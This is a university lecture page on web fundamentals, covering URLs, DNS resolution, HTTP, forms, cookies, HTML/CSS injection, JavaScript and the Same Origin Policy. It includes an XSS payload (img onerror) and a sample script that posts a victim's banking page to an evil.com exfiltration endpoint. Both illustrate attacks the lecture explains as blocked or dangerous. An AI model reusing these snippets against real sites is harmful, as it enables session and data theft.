World Wide Web

World Wide Web#

The World Wide Web probably is nothing new for you; after all, the first thing you did today was probably doomscrolling on some social network website, the very text you’re reading is served to you as a webpage and all the assignments so far required interacting with a web server (Flask in our case) via a web client library (Python requests). Websites can now do basically anything that a program running on your computer can, from accessing Bluetooth, battery level or your location, to using your GPU for rendering. And many programs you think are native are actually websites that run their own browser instance via Electron. Web technology has grown to be much more powerful than what the original authors could’ve imagined and is currently everywhere, so learning what makes it tick and what security implications it might have is very important.

The distinction between the Internet and the World Wide Web#

Before we start, allow us a quick side-note on some terminological pedantry as old as time itself. The Internet is the technology which is currently used to connect billions of devices together and allowing them to exchange arbitrary data. Most notably the TCP/IP stack, but in a broader sense also DNS, Ethernet, BGP and co. — layers 1 to 4 in the traditional OSI model. The World Wide Web on the other hand is one of the applications which run on the Internet. The millions of websites that send you HTML via HTTP, linked together with hyperlinks. One can exist without the other — you can send and receive emails through the Internet without ever touching a Web browser (even though everyone uses web-based clients now anyway) and you can download websites through networks other than the internet — for instance the fabled Dark Web uses the Tor network to exchange data (even though Tor itself is an overlay network and uses the Internet in the background).

What had to happen before you could read this page#

After you clicked a link or typed in the URL of our website, it took just the blink of an eye, but quite a lot happened before you could start reading the text. Your web browser had to parse the URL, take the hostname from the URL and resolve it to an IP address via DNS, send some IP packets to establish a TCP connection to our web server, give it information about itself and the requested page via HTTP, get a response, render the HTML, use the instructions in it to fetch related images and other files, apply CSS styles and execute some JavaScript.

The URL#

The Uniform Resource Locator is made up from multiple parts, the protocol determines which protocol should be used to obtain the resource (http or https in case of the Web), the authority comprising of a host (either a DNS name or an IP{v4,v6} address) and optionally the port (when unspecified, the default for each protocol is used), and a username optionally with a password. The authority is followed by a path similar to a filesystem path, the query specifying additional information and finally the fragment pointing to an element inside the page. Some parts of the URL may be percent-encoded — replaced with the percent sign and then a hex-encoded ASCII code of the character.

(Image courtesy of Wikipedia user Alhadis, licensed under CC BY-SA 4.0)

There are many things that can go subtly wrong when parsing a URL, including the interpretation of invalid characters which we mentioned last time, or, what happens when the user specifies the same query field multiple times — some web servers might choose the first or last value, others might collect the values into a list. Or, when is percent encoding supposed to be interpreted and how? (Like in the case of this Chrome bug which caused a crash with a weirdly percent-encoded URL)

Hostname resolution#

We will not go too deep into the inner workings of DNS in this lecture, but some of its implications might be interesting to us. To put it simply, it is a distributed database of small bits of data. When we want to know the IPv4 address of, for instance, one of the computers in Rotunda (u-pl1.ms.mff.cuni.cz), we first ask one of the root nameservers (the address of which we must know in advance, one of them is 198.41.0.4) for the A record for u-pl1.ms.mff.cuni.cz. It will not answer our question directly, as it doesn’t know the answer (that’s why it’s a distributed database), but gives us information on the most relevant nameserver for our question:

Output of the dig u-pl1.ms.mff.cuni.cz @198.41.0.4 command
; <<>> DiG 9.20.13 <<>> u-pl1.ms.mff.cuni.cz @198.41.0.4
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19417
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 9
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;u-pl1.ms.mff.cuni.cz.		IN	A

;; AUTHORITY SECTION:
cz.			172800	IN	NS	a.ns.nic.cz.
cz.			172800	IN	NS	c.ns.nic.cz.
cz.			172800	IN	NS	b.ns.nic.cz.
cz.			172800	IN	NS	d.ns.nic.cz.

;; ADDITIONAL SECTION:
a.ns.nic.cz.		172800	IN	A	194.0.12.1
a.ns.nic.cz.		172800	IN	AAAA	2001:678:f::1
c.ns.nic.cz.		172800	IN	A	194.0.14.1
c.ns.nic.cz.		172800	IN	AAAA	2001:678:11::1
b.ns.nic.cz.		172800	IN	A	194.0.13.1
b.ns.nic.cz.		172800	IN	AAAA	2001:678:10::1
d.ns.nic.cz.		172800	IN	A	193.29.206.1
d.ns.nic.cz.		172800	IN	AAAA	2001:678:1::1

;; Query time: 99 msec
;; SERVER: 198.41.0.4#53(198.41.0.4) (UDP)
;; WHEN: Tue Oct 21 18:10:05 CEST 2025
;; MSG SIZE  rcvd: 296

To summarize, “the nameservers responsible for the cz. domain are … and their IP addresses are …”. We call these nameservers authoritative for the cz. domain.

So we ask the cz. nameservers:

Output of the dig u-pl1.ms.mff.cuni.cz @194.0.12.1 command
; <<>> DiG 9.20.13 <<>> u-pl1.ms.mff.cuni.cz @194.0.12.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56618
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 7
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;u-pl1.ms.mff.cuni.cz.		IN	A

;; AUTHORITY SECTION:
cuni.cz.		3600	IN	NS	nsa.ces.net.
cuni.cz.		3600	IN	NS	cuce.ruk.cuni.cz.
cuni.cz.		3600	IN	NS	david.ruk.cuni.cz.
cuni.cz.		3600	IN	NS	golias.ruk.cuni.cz.

;; ADDITIONAL SECTION:
cuce.ruk.cuni.cz.	3600	IN	A	195.113.0.8
cuce.ruk.cuni.cz.	3600	IN	AAAA	2001:718:1e03:1::8
david.ruk.cuni.cz.	3600	IN	A	78.128.213.242
david.ruk.cuni.cz.	3600	IN	AAAA	2001:718:1203:502::2
golias.ruk.cuni.cz.	3600	IN	A	195.113.0.2
golias.ruk.cuni.cz.	3600	IN	AAAA	2001:718:1e03:1::2

;; Query time: 12 msec
;; SERVER: 194.0.12.1#53(194.0.12.1) (UDP)
;; WHEN: Tue Oct 21 18:12:02 CEST 2025
;; MSG SIZE  rcvd: 277

and they tell us to ask cuni.cz. nameservers, which direct us to mff.cuni.cz. nameservers which finally give us the answer of 195.113.21.131. Since going through this process for every single domain would be slow and the root nameservers would get quickly overloaded, there are two additional types of nameservers — recursive and caching. A recursive nameserver performs the complex resolution process and only gives clients the final answer (which it also caches for a while). Such nameservers are publicly available (for instance 9.9.9.9) or may be provided by your ISP. Caching nameservers usually forward requests to recursive ones, but also remember answers for some time. Such a nameserver most likely runs on your home router.

Why should we care about this? Firstly, rather obviously, DNS determines which server will the clients end up connecting to, so changing DNS allows an attacker to redirect all HTTP traffic. But hostnames are much more important for the web than just to determine which server to connect to. HTTP, unlike many other protocols, actually sends the hostname you used to the server, so the same server, on the same IP address, might give you an entirely different response depending on what hostname you used. This is a very common remedy to IPv4 depletion — you don’t have to give each website its own IP address, just have one webserver with one address which serves a different website for different hostnames, all with the same A record in DNS. Another aspect of the web where hostnames come into play are so-called origins — client-side security boundaries which we will discuss later.

Clients and servers#

On the Web, there are two main sides — the server and the client. The client sends a request and the server sends a response. The client can be a web browser, a command-line tool like curl or a library like Python requests and the server can be anything from a simple file server, which takes the path you give it, finds the file on the filesystem and sends you the contents of the file, to a completely custom program, which generates the response for each request programmatically. Websites, as you might know, are not the only thing served by webservers — HTTP can be used to create Application Programming Interfaces (APIs), which are used by programs to communicate between each other. For instance, the entire Matrix messaging protocol is built on HTTP.

HTTP#

The HyperText Transfer Protocol is the main protocol used on the Web. It is an application protocol built on top of TCP, the client first establishes a TCP connection to the server, which acts as a bidirectional pipe for sending bytes, through which the client sends its request and the server sends the response.

There are multiple versions of the HTTP protocol. Version 1.1 is the most commonly used and simplest, versions 2 and 3 maintain the same semantics, just encode them differently and introduce advanced, mostly performance-related, features. HTTPS encrypts and signs all traffic via TLS, but the plaintext data is normal HTTP.

Anatomy of a HTTP request and response#

A simple HTTP request to get the website you’re looking at right now might look something like this: (note that HTTP uses CRLF line endings)

GET /pitfalls/03-www/ HTTP/1.1
Host: kam.mff.cuni.cz
Connection: close

The first line contains the method — what we want to do with the resource, the path and the version of HTTP we want to use. The following lines contain headers — key-value pairs separated by colons which communicate some metadata about the request. In this case, the required Host header informs the server of the hostname from the URL (as we mentioned earlier) and the Connection: close header instructs the server to close the connection after sending the response.

A response might look something like this:

HTTP/1.1 200 OK
Content-Length: 25380
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en-us" dir="ltr">
 ...

The first line contains the version and a status code with its human-readable meaning. The following lines contain headers, followed by an empty line (or CRLF twice in a row) and then the content of the response.

Methods#

HTTP defines multiple methods (sometimes called verbs), which define what we want to do with the resource, since HTTP can be used for other things than just GETing files.

  • GET — We want the server to reply with the data of the resource. GET requests, unlike with other methods, may not contain content.
  • HEAD — Like GET, but we only want to receive the headers, not the content. Can be, for instance, used to check whether the resource has changed since we last saw it.
  • POST — Submit something new to the resource or perform a generic change in state. For instance login to your account or send an order for ice cream. POST requests will usually have some content.
  • PUT — Replace something that already exists with the request content.
  • DELETE — Delete something.
  • PATCH — Partially modify something.
  • OPTIONS — Used to determine which methods are permitted for the resource. Also used with CORS, which will be mentioned in future lectures.
  • CONNECT — Used by HTTP proxies.
  • TRACE — The request should continue through any proxy and get returned in the body of the response by the last server in the chain, like a HTTP alternative of a ping. Most servers disallow it.

Individual methods also specify some guarrantees about how the server may react to them — whether they are Safe, Idempotent and Cacheable.

  • Safe methods mustn’t modify any state on the server — browsers should be able to perform GET requests on any URL without performing any meaningful action on behalf of the user. GET, HEAD, OPTIONS and TRACE are Safe.
  • Idempotent methods must be repeatable without changing their outcome — calling DELETE twice on the same resource shouldn’t delete anything else. All Safe methods and additionally DELETE and PUT are Idempotent.
  • Responses to Cacheable methods may be cached (by proxies or browers) and shown to users without requesting again with respect to other caching rules. Only GET and HEAD are Cacheable.

Notable headers#

There are many headers specified in the standard and even more non-standard ones which are nonetheless widely used. A list of them can be found on MDN, we’ll mention only some of the interesting ones.

  • Content-Length is required and specifies the length of the request/response content in bytes. Without it, the recipient has no way of telling, where the body ends, since multiple requests/responses may be sent over one TCP connection.
  • Content-Type specifies the MIME type of the content. An Accept header may be sent in a response/request to tell the recipient in advance which MIME types is the sender willing to accept.
  • Referer is the URL of the site which sent us here. When you click a link, the URL of the site containing the link will be placed in the Referer header. The Origin header is similar to Referer, but does not contain the path and may be used to enforce the Same Origin Policy.
  • User-Agent contains information about the client’s software — browser, library, command-line tool, sometimes also operating system or display manager.
  • Set-Cookie allows the server to set small pieces of information, which the client sends back with every request in the Cookie header.
  • Range can be used to request just a part of the document, for instance when a download of a large file fails mid-way.
  • Location contains the URL of a resource the client is being redirected to.
  • Many headers exist to control caching and allow browsers to figure out whether they need to fetch the site again or not. Including Cache-Control, Age, Vary, Last-Modified, If-*

Response codes#

Response codes are used to summarize the meaning of the response in a machine readable way. The full list can be again found on MDN. Response codes can be split into 5 categories by the hundreds digit, the x00 is usually the most general variant.

  • 1xx — Informational — seldom used, provides information about an ongoing request/response exchange.
  • 2xx — Successful — everything went (mostly) well
    • 200 — OK
    • 201 — Created, usually the response to a successful POST
    • 204 — No Content
  • 3xx — Redirection — you should find your response somewhere else
    • 300 — The client should choose between multiple versions. There’s no standardised way to perform this choice automatically, so it’s seldom used.
    • 301 — Moved permanently — You’ll find what you’re looking for at a different URL, and you should always use the new URL from now on.
    • 302 — Found — You’ll find what you’re looking for at a different URL, and you should check again next time.
    • 304 — Not modified — You should use the cached version of the resource you already have.
    • 307 — Temporary redirect — Newer variant of 302, additionally, you shouldn’t change the request method.
    • 308 — Permanent redirect — Newer variant of 301, additionally, you shouldn’t change the request method.
  • 4xx — Client error — Something is wrong and it’s your fault
    • 400 — Bad request
    • 401 — Unauthorized — I don’t know who you are, login please
    • 403 — Forbidden — I know who you are and I won’t send this to you
    • 404 — Not found — You probably know this one
    • 405 — Method not allowed
    • 418 — You tried to brew coffee in a teapot
  • 5xx — Server error — Something is wrong and it’s my fault
    • 500 — Internal server error
    • 502 — Bad gateway — The server tried to send your request to another server and it didn’t respond correctly.

Submitting forms#

HTTP has had a way of sending information back to the server since the beginning and that was the <form> HTML element. There are actually three different ways information from a form may be sent to the server.

The first one, used when you set the form’s method attribute to get will send the data (as the name suggests) with a GET request. Since GET requests cannot contain content, the value of each <input> is sent as a query parameter in the URL, the name of the parameter is determined by the name attribute of each <input> element.

The input for the following form:

<form metod="GET" action="/search">
  <input type="text" name="author">
  <input type="text" name="title">
  <input type="submit">
</form>

will be sent in a request similar to this:

GET /search?author=Mares&title=Pruvodce HTTP/1.1
Host: dspace.cuni.cz

Since GET requests may not modify any state and query strings get saved into your browser history, this method is mainly useful for searching, filtering or otherwise fine-tuning the retrieval of some resources.

The second way is used when you set the form’s method attribute to post. It sends a POST request with the <input> values in the same format as before, just in the request content instead of the path, with the Content-Type header set to application/x-www-form-urlencoded:

The input for the following form:

<form metod="POST" action="/login">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit">
</form>

will be sent in a request similar to this:

POST / HTTP/1.1
Host: example.com
Content-Length: 28
Content-Type: application/x-www-form-urlencoded

username=me&password=pass123

Finally, if you set the form’s method attribute to post and the enctype to multipart/form-data, the multipart/form-data content type will be used. This is the only way to include those file upload input fields in a normal HTML form. When creating the request, a boundary is selected such that it never occurs in any of the sent values and the values are then separated by these boundaries. Headers can be placed before the content of each value to provide metadata about it.

The input for the following form:

<form action="/evaluate" method="post" enctype="multipart/form-data">
  <input type="text" name="comment">
  <input type="file" name="solution">
  <input type="submit">
</form>

will be sent in a request similar to this:

POST /evaluate HTTP/1.1
Host: recodex.mff.cuni.cz
Content-Type: multipart/form-data; boundary=----geckoformboundary5a808c0936d1b2c17c790995ceaeea6c
Content-Length: 410

------geckoformboundary5a808c0936d1b2c17c790995ceaeea6c
Content-Disposition: form-data; name="comment"

This is my solution :)
------geckoformboundary5a808c0936d1b2c17c790995ceaeea6c
Content-Disposition: form-data; name="solution"; filename="solve.py"
Content-Type: text/x-python

import requests

print(requests.get("http://vulnbox/flag"))

------geckoformboundary5a808c0936d1b2c17c790995ceaeea6c--

Nowadays, it is also quite common to process the contents of a form with JavaScript and send the data to the server asynchronously, in whatever format is available, for instance JSON.

Cookies#

Since the server has no way of telling different users apart,1 a mechanism was needed for websites to store bits of information in the user’s browser which could be used to identify them and retrieve data about them from the database or store relevant data about them directly. This is done with cookies.

Cookies are a key-value storage and the server can store cookies by setting the Set-Cookie header in the response:

HTTP/1.1 200 OK
Set-Cookie: session=dQw4w9WgXcQ
Set-Cookie: theme=dark

For every subsequent request, the browser then sends the Cookie header with all the cookies previously set by the server:

GET / HTTP/1.1
Host: example.com
Cookie: session=dQw4w9WgXcQ; theme=dark

Lifetime of cookies#

By default, cookies are deleted when the “current session” ends. When this happens is up to the browser, but it is commonly when you close the browser window. To prolong the lifetime of a cookie, you may set the Expires attribute to a date or Max-Age attribute to a number of seconds:

HTTP/1.1 200 OK
Set-Cookie: session=dQw4w9WgXcQ; Expires=Thu 06 Nov 2025 12:00:00 GMT+1
Set-Cookie: theme=dark; Max-Age: 2175984000

Scope of cookies#

Since users usually visit more than one website with their browsers, it would be both inconvenient and a security nightmare to send all cookies to everyone. That’s why the browser remembers the site which set each cookie and doesn’t send it to any other site. By default, a cookie will be sent with all requests to the same hostname as the one that set it.

You can customize this by setting the Domain attribute to a different domain, but it must be a suffix of the current one. After that the cookie will be sent with all requests to the specified domain and all subdomains (note that this doesn’t happen when you don’t set this attribute — setting the Domain attribute can only make the cookie more visible).

The Path attribute restricts the cookie to the provided path and all subpaths. The default is the currently requested path, so if you set a cookie in response to a POST request to /login, it will only be sent with requests to URLs that start with /login. Since this is usually not what you want, it is common to set the Path attribute to /.

Cookies and tracking#

You’ve probably already heard that “cookies are used to track you”, but how does that actually work? Let’s see an example of an ad company that pays websites for showing ads to their users. This usually works by embedding an iframe into the website, which shows the actual ad. So, you visit beans.com (because you want to buy some beans) and the site embeds an iframe of ads.net. When your browser makes the request to ads.net, it sets the Referer header to beans.com, so the ad company knows you’re viewing their ad embedded into beans.com and they know who to pay. In the response from ads.net, the server sends you a unique ID in a cookie. Later, when you visit bananas.com, which also embeds ads from the same provider, your browser makes a request to ads.net again, including Referer set to bananas.com and the ID cookie you got sent earlier. Now ads.net knows you’re the same person who visited beans.com earlier, so you probably like beans and now all your ads have beans in them. By doing this, the ad company can see all the sites with their ads you visit and create a fairly comprehensive profile of your interests.

HTML & CSS#

So far we’ve learned a lot about how browsers communicate with web servers over HTTP, but an equally important part of the Web is how browsers render the website data they receive, so let’s talk about HTML and CSS.

HTML (HyperText Markup Language) is an XML-based markup language which dictates the overall structure of the page and CSS (Cascading Style Sheets) is used to further configure attributes of the elements on the page and even though they are separate languages, their responsibilities often overlap.

Since basic HTML website making is taught in NSWI141, we won’t go into detail about the basics. On the other hand, a lot of new tech has been introduced in the past few years which allows you to do things which originally required horrible hacks or humongous JavaScript frameworks. If it has been a while since you’ve written pure HTML, it might be nice to look through the list of all HTML elements and see what you’ve missed. Did you know there are two different progressbar-like elements? There’s a whole API for custom components which lets you define React-like elements in just a few lines of JS? That you don’t need a preprocessor to nest CSS, use variables or handle darkmode?

Injections in HTML and CSS#

As with any markup language, you must be very careful to never let unsanitized user input get included in your HTML. If a user can run JavaScript from your site, they have access to all your data, can impersonate your users and you really do not want that. You might be tempted to think “Ah, I’ll just filter out all the <script> tags and it’ll be grand, ey?” There are many ways to run JavaScript in HTML, for instance the onerror attribute of the <img> tag allows you to run JavaScript whenever the loading of an image fails, so

<img src="nonexistent.png" onerror="alert(1)">

is just as good as a full blown script tag. Even if you can only inject CSS, you can still create a keylogger or leak the user’s history.

JavaScript#

Users of the web soon wanted to add more interactive elements to their static documents. It started out with forms allowing the websites to send data from the user back the server, but something more dynamic was needed. Netscape Navigator introduced JavaScript — a scripting language intended to add interactivity to HTML documents.

Take this web page, that is validating whether the entered number is divisible by 13 using JavaScript:

<input type="text" id="numbertotest" placeholder="Enter your number" onchange="check()">
<p id="result"></p>
<script>
// Select the relevant elements
const inputField = document.getElementById("numbertotest");
const outputTag = document.getElementById("result");
function check() {
  // Convert the string value to integer
  let inputValue = parseInt(inputField.value, 10);
  // Do the check and set the result accordingly
  if (inputValue%13==0) {
    outputTag.innerHTML = "<b>This number is divisible by 13!</b>";
  } else {
    outputTag.innerText = "This number is NOT divisible by 13!";
  }
}
</script>

The final page will then look like this:

A tree representation of the document nodes accessible directly from JavaScript is the DOM (Document Object Model) — those are the document.getElementById calls finding the wanted node in the tree. The users create events as they interact with the website — like the onchange here, that the JavaScript then processes, or the developer can just make some code run periodically, for example to fetch updates.

Over time, more and more features were added to JavaScript.

Like the fetch() API in JavaScript, that can be used to get (or post) data from (to) a server, that is then parsed and the website content is updated dynamically right in the browser.

We can use it to fetch greeting from our course website and display it on the current page:

fetch("https://kam.mff.cuni.cz/pitfalls/test.json").then(r => r.json()).then(r => document.write(r["greeting"]))

While browsing the web today you notice most of the sites are highly interactive. Websites nowadays are quite big JavaScript programs running inside your browser, only using the server for state and communication purposes. JavaScript frameworks, such as React or Vue are used to facilitate this process. JavaScript is used for much more than just occasional interactivity.

The increasing size of executed JavaScript created big demand for browsers to run JavaScript fast, making browsers utilize JIT (just-in-time) compilers and advanced optimizations.

WebAssembly, an assembly-like language runnable in browsers, can be used to efficiently run C#, C++/C, Python, or pretty much any language right inside the browser, including GUI.

Browsers today are really massive pieces of software. There is however one aspect of them that we haven’t touched yet.

Everything they execute or work with must be considered untrusted.

When you browse the internet and click on evil.com website you don’t want this website to be any danger for you in any way. People often browse untrusted and shady websites, and then open their sensitive internet banking or family pictures in the same session. This means the browser needs to create strong security barriers between the different sites, as well as the sites and the computer itself.

Just take a look at this piece of code and consider that it is present on evil.com:

<iframe id="banking" src="https://internet-banking.com/dashboard">
</iframe>
<script>
// Get reference to the iframe with banking
const bankingFrame = document.getElementById("banking");
// Access the DOM of the inner website
let leakedBanking = bankingFramewind.contentDocument.body.innerHTML;
// Exfiltrate the internet banking content back to the attacker
fetch("https://evil.com/exfiltrate", {
  method: 'POST',
  body: leakedBanking,
  headers: {
    'Content-Type': 'text/plain'
  }
})
</script>

The code uses an <iframe> tag to embed an internet banking website. Iframe can be used this way to embed other pages inside your page. Consider that the user of the browser is logged in, so the cookies and all the site data would load inside the iframe2.

The evil.com website now tries to access this juicy content using the JavaScript DOM API. You probably feel that this should fail, this is dangerous and should not be possible. You are right.

Same Origin Policy (SOP)#

The Same Origin Policy is one of the main security boundaries inside web browsers.

Two websites can access each others’ data only if they have the same origin. Origin is the protocol, host, and the port of the URL of the website. If two websites are on different origins, their should not be able to access each others data.

URL Outcome Reason
http://store.company.com/dir2/other.html Same origin Only the path differs
http://store.company.com/dir/inner/another.html Same origin Only the path differs
https://store.company.com/page.html Failure Different protocol
http://store.company.com:81/dir/page.html Failure Different port (http:// is port 80 by default)
http://news.company.com/dir/page.html Failure Different host

(Table courtesy of Mozilla Developer Network, Mozilla Contributors, licensed under CC-BY-SA 2.5.)

So in our case, evil.com won’t be able to access internet-banking.com, because the origin is obviously different. So we are safe, or are we?

Well, it’s not that simple. The problem of secure isolation of different contexts is complicated, even more so complicated because of the document-oriented legacy of the web. However, in modern browsers are quite successfully mitigating these problems. We will talk about both more in depth in the upcoming lectures.

Browser Developer Tools#

The developer tools (or just “devtools”) is a very useful tool right inside the web browser. Usually it can be summoned by pressing the key F12 or right-clicking the website and clicking “Inspect element”.

You can use them to browse the website’s DOM in the Inspector tab. Let’s see if you can use that feature to uncover a hidden operation of the number division checker above :)

There is also the Console you can use to execute JavaScript in the context of the website. You can use it to try running the JavaScript fetch code from above :)

DISCLAIMER: Never paste code you don’t trust into the console. As this can lead to an attacker compromising the data you have on the side where you do that.

Other useful tabs include the Network tab, where you can see all the requests made by the website. And the Sources or Debugger tab, where you can inspect all JavaScript that is included by the site.

TLDR#

  • Web technology is everywhere and it is incredibly complex
  • There is a difference between the Web and the Internet
  • Hostnames aren’t just for finding the right server, but they pose an important security boundary.
  • HTTP exists, has mutliple versions and is used for many things other than websites.
  • There are three different ways to submit forms.
  • Cookies have lifetimes and scopes and can track you.
  • HTML and CSS has many new features you might not know about.
  • JavaScript started as a very simple form validation mechanism, but turned into the monster it is today.
  • Websites can run arbitrary code, so we need to sandbox them carefully.
  • Origins are important security boundaries and must be carefully protected.
  • Websites can easily be inspected and modified using DevTools.

Further resources#


  1. Well, except IP addresses, but with IPv4, many users might be connecting from the same NATed public IP, so it’s not very reliable… ↩︎

  2. In current browsers, there are even more gradual protections, that allow sites to disable such embedding entirely or granularly set which cookies should be sent↩︎